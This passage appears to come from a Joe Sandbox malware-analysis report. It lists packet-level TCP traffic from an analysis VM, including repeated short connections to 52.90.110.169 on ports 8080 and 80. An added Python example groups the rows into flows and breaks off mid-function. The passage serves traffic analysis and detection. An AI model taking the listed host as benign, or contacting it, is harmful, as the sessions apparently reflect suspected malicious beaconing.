Jul 25, 2024 17:54:31.313343048 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:31.316278934 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:31.316289902 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.316526890 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.340521097 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:31.384506941 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.582511902 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.582567930 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.582609892 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.582704067 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:31.582732916 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.582874060 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:31.587287903 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.587384939 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:31.587393045 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.588156939 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.588175058 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:31.588197947 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.588212013 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:31.588217974 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.588227987 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:31.588231087 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:38.978712082 CEST | 49717 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:38.978799105 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:38.978890896 CEST | 49717 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:38.979571104 CEST | 49717 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:38.979598999 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:40.482805967 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:40.483047009 CEST | 49717 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:40.488200903 CEST | 49717 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:40.488229036 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:40.489084005 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:40.490931988 CEST | 49717 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:40.491008043 CEST | 49717 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:40.491019011 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:40.491117954 CEST | 49717 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:40.532555103 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:41.144376993 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:41.144543886 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:41.144911051 CEST | 49717 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:41.144947052 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:41.144965887 CEST | 49717 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:41.144972086 CEST | 443 | 49717 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:47.540843010 CEST | 80 | 49711 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:54:47.541023970 CEST | 49711 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:54:47.541112900 CEST | 49711 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:54:47.545984030 CEST | 80 | 49711 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:54:49.657166004 CEST | 49718 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:54:49.662364960 CEST | 80 | 49718 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:54:49.662476063 CEST | 49718 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:54:49.663119078 CEST | 49718 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:54:49.668275118 CEST | 80 | 49718 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:01.619185925 CEST | 49719 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:01.619240999 CEST | 443 | 49719 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:01.619326115 CEST | 49719 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:01.620003939 CEST | 49719 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:01.620021105 CEST | 443 | 49719 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:03.536003113 CEST | 443 | 49719 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:03.536245108 CEST | 49719 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:03.538173914 CEST | 49719 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:03.538192034 CEST | 443 | 49719 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:03.538497925 CEST | 443 | 49719 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:03.540375948 CEST | 49719 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:03.540465117 CEST | 49719 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:03.540472984 CEST | 443 | 49719 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:03.540621996 CEST | 49719 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:03.584502935 CEST | 443 | 49719 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:03.715455055 CEST | 443 | 49719 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:03.715533018 CEST | 443 | 49719 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:03.715668917 CEST | 49719 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:03.715843916 CEST | 49719 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:03.715857983 CEST | 443 | 49719 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:07.749150038 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:07.749183893 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:07.749275923 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:07.749644995 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:07.749658108 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.299978018 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.300040007 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:09.302829981 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:09.302843094 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.303076029 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.306896925 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:09.348546982 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.568620920 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.568660021 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.568676949 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.568955898 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:09.568980932 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.569041014 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:09.572948933 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.572990894 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.573036909 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.573069096 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:09.573122025 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:09.573201895 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:09.573219061 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:09.573230028 CEST | 49720 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:55:09.573235035 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:55:11.045417070 CEST | 80 | 49718 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:11.045495987 CEST | 49718 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:11.046040058 CEST | 49718 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:11.053024054 CEST | 80 | 49718 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:12.059077024 CEST | 49721 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:12.064285994 CEST | 80 | 49721 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:12.065888882 CEST | 49721 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:12.066039085 CEST | 49721 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:12.073990107 CEST | 80 | 49721 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:25.458007097 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:25.458076954 CEST | 443 | 49722 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:25.458177090 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:25.458863974 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:25.458878040 CEST | 443 | 49722 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:26.593583107 CEST | 443 | 49722 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:26.593772888 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:26.595622063 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:26.595655918 CEST | 443 | 49722 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:26.595918894 CEST | 443 | 49722 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:26.597933054 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:26.598052025 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:26.598063946 CEST | 443 | 49722 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:26.598223925 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:26.644507885 CEST | 443 | 49722 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:26.788438082 CEST | 443 | 49722 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:26.789216995 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:26.789297104 CEST | 443 | 49722 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:26.789369106 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:26.789536953 CEST | 443 | 49722 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:26.789623976 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:26.789680958 CEST | 49722 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:33.455132008 CEST | 80 | 49721 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:33.455482006 CEST | 49721 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:33.455589056 CEST | 49721 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:33.465553999 CEST | 80 | 49721 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:34.471539021 CEST | 49723 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:34.476825953 CEST | 80 | 49723 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:34.476921082 CEST | 49723 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:34.477086067 CEST | 49723 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:34.488125086 CEST | 80 | 49723 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:50.424643040 CEST | 49704 | 80 | 192.168.2.6 | 2.19.97.171
Jul 25, 2024 17:55:50.458551884 CEST | 80 | 49704 | 2.19.97.171 | 192.168.2.6
Jul 25, 2024 17:55:50.458667994 CEST | 49704 | 80 | 192.168.2.6 | 2.19.97.171
Jul 25, 2024 17:55:50.513789892 CEST | 49723 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:51.565897942 CEST | 49724 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:51.573383093 CEST | 8080 | 49724 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:51.576596022 CEST | 49724 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:51.576884985 CEST | 49724 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:55:51.581801891 CEST | 8080 | 49724 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:55:52.871532917 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:52.871598005 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:52.871834040 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:52.872520924 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:52.872549057 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:53.689729929 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:53.689821959 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:53.691708088 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:53.691720009 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:53.692012072 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:53.703605890 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:53.703691959 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:53.703696966 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:53.703846931 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:53.744491100 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:53.892640114 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:53.892719030 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:53.893162966 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:53.893198013 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:53.893205881 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:55:53.893213034 CEST | 443 | 49725 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:55:53.893224001 CEST | 49725 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:12.946147919 CEST | 8080 | 49724 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:12.946253061 CEST | 49724 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:12.949676991 CEST | 49724 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:12.954898119 CEST | 8080 | 49724 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:14.977638960 CEST | 49726 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:14.988527060 CEST | 8080 | 49726 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:14.989790916 CEST | 49726 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:15.027879000 CEST | 49726 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:15.035418034 CEST | 8080 | 49726 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:21.433706999 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:21.433753014 CEST | 443 | 49727 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:56:21.433811903 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:21.434535980 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:21.434552908 CEST | 443 | 49727 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:56:22.567063093 CEST | 443 | 49727 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:56:22.567321062 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:22.574461937 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:22.574481964 CEST | 443 | 49727 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:56:22.574771881 CEST | 443 | 49727 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:56:22.576752901 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:22.576829910 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:22.576834917 CEST | 443 | 49727 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:56:22.576961994 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:22.620549917 CEST | 443 | 49727 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:56:22.750425100 CEST | 443 | 49727 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:56:22.750833035 CEST | 443 | 49727 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:56:22.751246929 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:22.751312971 CEST | 443 | 49727 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:56:22.751324892 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:56:22.751324892 CEST | 49727 | 443 | 192.168.2.6 | 40.113.110.67
                            Jul 25, 2024 17:56:22.751337051 CEST4434972740.113.110.67192.168.2.6
                            Jul 25, 2024 17:56:23.050139904 CEST497268080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:24.065493107 CEST497288080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:24.070488930 CEST80804972852.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:24.070573092 CEST497288080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:24.070729971 CEST497288080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:24.075514078 CEST80804972852.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:32.080676079 CEST497288080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:33.097110033 CEST497298080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:33.106733084 CEST80804972952.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:33.110219955 CEST497298080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:33.110414028 CEST497298080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:33.116117954 CEST80804972952.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:37.112000942 CEST497298080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:38.206617117 CEST4973080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:38.509855986 CEST804973052.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:38.509924889 CEST4973080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:38.510205984 CEST4973080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:38.516333103 CEST804973052.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:50.637783051 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:50.637823105 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:50.637947083 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:50.638761044 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:50.638777971 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.530021906 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.530323029 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.532392979 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.532404900 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.532783031 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.534595966 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.534672022 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.534677982 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.534815073 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.580492020 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.737180948 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.738842010 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.738871098 CEST4434973140.115.3.253192.168.2.6
                            Jul 25, 2024 17:56:51.738884926 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:51.738949060 CEST49731443192.168.2.640.115.3.253
                            Jul 25, 2024 17:56:59.947873116 CEST804973052.90.110.169192.168.2.6
                            Jul 25, 2024 17:56:59.948014975 CEST4973080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:59.948060989 CEST4973080192.168.2.652.90.110.169
                            Jul 25, 2024 17:56:59.953325033 CEST804973052.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:01.977514982 CEST4973280192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:01.982506037 CEST804973252.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:01.982621908 CEST4973280192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:01.982738972 CEST4973280192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:01.987514019 CEST804973252.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:05.987539053 CEST4973280192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:07.008379936 CEST4973380192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:07.013673067 CEST804973352.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:07.013787031 CEST4973380192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:07.014034986 CEST4973380192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:07.019023895 CEST804973352.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:11.023216009 CEST4973380192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:12.039932966 CEST4973480192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:12.045190096 CEST804973452.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:12.045269012 CEST4973480192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:12.045528889 CEST4973480192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:12.050493956 CEST804973452.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:16.369026899 CEST4973480192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:17.565691948 CEST4973580192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:17.572041035 CEST804973552.90.110.169192.168.2.6
                            Jul 25, 2024 17:57:17.572134972 CEST4973580192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:17.572288990 CEST4973580192.168.2.652.90.110.169
                            Jul 25, 2024 17:57:17.577965021 CEST804973552.90.110.169192.168.2.6
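
The per-packet rows above are easier to read as connections: every exchange with 52.90.110.169 is a fresh ephemeral port from the VM, first to 8080 and then to 80, while the 443 traffic goes to Microsoft address space. The script below is an added example, not part of the Joe Sandbox report. It takes a constructed subset of the rows above in the reconstructed column layout, groups packets into flows keyed by the VM's client port, counts direction and duration, and lists the flows whose server port is outside 80/443, which is what the report's "Communication To Uncommon Destination Ports" signature fires on for the 8080 sessions. HOME_HOST, COMMON_PORTS and the row subset are assumptions of the example.

```python
"""Collapse per-packet TCP rows into per-connection flows (added example)."""
from collections import OrderedDict
from datetime import datetime

HOME_HOST = "192.168.2.6"   # the analysis VM in this report (assumption)
COMMON_PORTS = {80, 443}    # assumption: any other server port is "uncommon"

# Constructed subset of the TCP rows above, in the reconstructed column layout.
SAMPLE_ROWS = """\
Jul 25, 2024 17:56:12.946147919 CEST | 8080 | 49724 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:12.946253061 CEST | 49724 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:12.949676991 CEST | 49724 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:12.954898119 CEST | 8080 | 49724 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:14.977638960 CEST | 49726 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:14.988527060 CEST | 8080 | 49726 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:14.989790916 CEST | 49726 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:15.027879000 CEST | 49726 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:15.035418034 CEST | 8080 | 49726 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:23.050139904 CEST | 49726 | 8080 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:38.206617117 CEST | 49730 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:38.509855986 CEST | 80 | 49730 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:38.509924889 CEST | 49730 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:38.510205984 CEST | 49730 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:56:38.516333103 CEST | 80 | 49730 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:50.637783051 CEST | 49731 | 443 | 192.168.2.6 | 40.115.3.253
Jul 25, 2024 17:56:50.637823105 CEST | 443 | 49731 | 40.115.3.253 | 192.168.2.6
Jul 25, 2024 17:56:50.637947083 CEST | 49731 | 443 | 192.168.2.6 | 40.115.3.253
Jul 25, 2024 17:56:59.947873116 CEST | 80 | 49730 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:56:59.948014975 CEST | 49730 | 80 | 192.168.2.6 | 52.90.110.169
"""


def parse_row(line):
    """'<timestamp> | <src port> | <dst port> | <src ip> | <dst ip>' -> tuple."""
    ts, sport, dport, sip, dip = (col.strip() for col in line.split("|"))
    # Drop the 'CEST' suffix; strptime accepts at most six fractional digits.
    main, frac = ts.rsplit(" ", 1)[0].split(".")
    when = datetime.strptime(f"{main}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return when, int(sport), int(dport), sip, dip


def build_flows(text, home=HOME_HOST):
    """Group packets into flows keyed (client port, server ip, server port).

    Packets in either direction land in the same flow because the key is
    always normalised to the VM's side of the connection.
    """
    flows = OrderedDict()
    for line in text.splitlines():
        when, sport, dport, sip, dip = parse_row(line)
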